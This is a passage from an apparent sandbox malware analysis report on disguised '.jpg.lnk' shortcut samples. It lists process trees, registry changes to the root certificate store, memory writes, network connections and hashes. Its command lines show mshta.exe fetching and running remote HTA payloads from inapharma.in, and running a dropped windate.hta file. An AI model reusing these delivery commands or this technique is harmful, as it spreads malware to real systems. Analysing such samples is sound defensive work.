5c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Windows\System32\mshta.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Windows\System32\mshta.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Windows\System32\mshta.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\mshta.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1500 wrote to memory of 1932 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 1500 wrote to memory of 1932 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 1500 wrote to memory of 1932 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 1932 wrote to memory of 1144 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe
PID 1932 wrote to memory of 1144 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe
PID 1932 wrote to memory of 1144 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG_20210111_125841.jpg.lnk

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" https://inapharma.in/css/files/photos/Sunakshi/IMG_20210111_125841

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" C:\ProgramData\Duolingo\windate.hta

Network

Country Destination Domain Proto
US 8.8.8.8:53 inapharma.in udp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp

Files

memory/1500-54-0x000007FEFC371000-0x000007FEFC373000-memory.dmp

memory/1932-91-0x000007FEF3780000-0x000007FEF416C000-memory.dmp

memory/1932-92-0x0000000003130000-0x0000000003138000-memory.dmp

memory/1932-93-0x000000001DA87000-0x000000001DA88000-memory.dmp

C:\ProgramData\Duolingo\windate.hta

MD5 df0ae835a1dc249c25f56c96a19c63c7
SHA1 388bb0c49057b08a6fc5e7d4fcaab18754650c59
SHA256 7838794872d83079d1a912e0201a76aff8b42404dde2117a5c57a3bb3310d1df
SHA512 d4f538231d4c67407778dbfa6d825c53e59ce70e11a9d8add0e47ee248c0d8b5053285f197e9259af24898e15178a600f5bf852ef3a98258c61c9c67a9898aa8

Analysis: behavioral32

Detonation Overview

Submitted

2022-03-22 12:37

Reported

2022-03-22 12:57

Platform

win10v2004-en-20220113

Max time kernel

314s

Max time network

703s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\Image-8646-ZP.jpg.lnk

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\mshta.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3816 wrote to memory of 5100 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 3816 wrote to memory of 5100 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\Image-8646-ZP.jpg.lnk

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" https://inapharma.in/css/files/photos/Bn-Offrs-Album/Image-8646-ZP

Network

Country Destination Domain Proto
US 8.8.8.8:53 inapharma.in udp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 8.8.8.8:53 176.122.125.40.in-addr.arpa udp
US 8.8.8.8:53 api.msn.com udp
US 204.79.197.203:443 api.msn.com tcp

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2022-03-22 12:37

Reported

2022-03-22 12:58

Platform

win10v2004-en-20220113

Max time kernel

702s

Max time network

710s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG20100510223001.jpg.lnk

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\mshta.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2004 wrote to memory of 4348 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 2004 wrote to memory of 4348 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG20100510223001.jpg.lnk

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" https://inapharma.in/css/files/photos/Radhika-Images/Image2

Network

Country Destination Domain Proto
US 8.8.8.8:53 inapharma.in udp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp

Files

N/A

Analysis: behavioral20

Detonation Overview

Submitted

2022-03-22 12:37

Reported

2022-03-22 12:58

Platform

win10v2004-en-20220113

Max time kernel

699s

Max time network

712s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG_20201220_211940.jpg.lnk

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Windows\System32\mshta.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Windows\System32\mshta.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 784 wrote to memory of 1556 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 784 wrote to memory of 1556 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG_20201220_211940.jpg.lnk

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" https://inapharma.in/css/files/photos/Sunakshi/IMG_20201220_211940

C:\Windows\System32\Upfc.exe

C:\Windows\System32\Upfc.exe /launchtype periodic /cv ivHiqe6NuU2kU45ywuQPJw.0

Network

Country Destination Domain Proto
US 8.8.8.8:53 inapharma.in udp
US 162.144.86.32:443 inapharma.in tcp
US 209.197.3.8:80 tcp
US 209.197.3.8:80 tcp
US 209.197.3.8:80 tcp
US 8.8.8.8:53 crl.usertrust.com udp
US 104.18.30.182:80 crl.usertrust.com tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp

Files

memory/1556-131-0x00000277A67F6000-0x00000277A67F7000-memory.dmp

memory/1556-132-0x00007FF9A41F0000-0x00007FF9A4CB1000-memory.dmp

Analysis: behavioral25

Detonation Overview

Submitted

2022-03-22 12:37

Reported

2022-03-22 12:57

Platform

win7-20220311-en

Max time kernel

302s

Max time network

1219s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG_20210603_122331.jpg.lnk

Signatures

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\System32\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\System32\mshta.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Windows\System32\mshta.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Windows\System32\mshta.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Windows\System32\mshta.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Windows\System32\mshta.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\mshta.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 808 wrote to memory of 432 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 808 wrote to memory of 432 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 808 wrote to memory of 432 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 432 wrote to memory of 912 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe
PID 432 wrote to memory of 912 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe
PID 432 wrote to memory of 912 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG_20210603_122331.jpg.lnk

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" https://inapharma.in/css/files/photos/Sunakshi/IMG_20210603_122331

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" C:\ProgramData\Duolingo\windate.hta

Network

Country Destination Domain Proto
US 8.8.8.8:53 inapharma.in udp
US 162.144.86.32:443 inapharma.in tcp
US 8.8.8.8:53 crl.comodoca.com udp
US 104.18.30.182:80 crl.comodoca.com tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp

Files

memory/808-54-0x000007FEFBCC1000-0x000007FEFBCC3000-memory.dmp

memory/432-91-0x00000000037E0000-0x00000000037E8000-memory.dmp

memory/432-92-0x000007FEF35D0000-0x000007FEF3FBC000-memory.dmp

memory/432-93-0x000000001DEF7000-0x000000001DEF8000-memory.dmp

C:\ProgramData\Duolingo\windate.hta

MD5 df0ae835a1dc249c25f56c96a19c63c7
SHA1 388bb0c49057b08a6fc5e7d4fcaab18754650c59
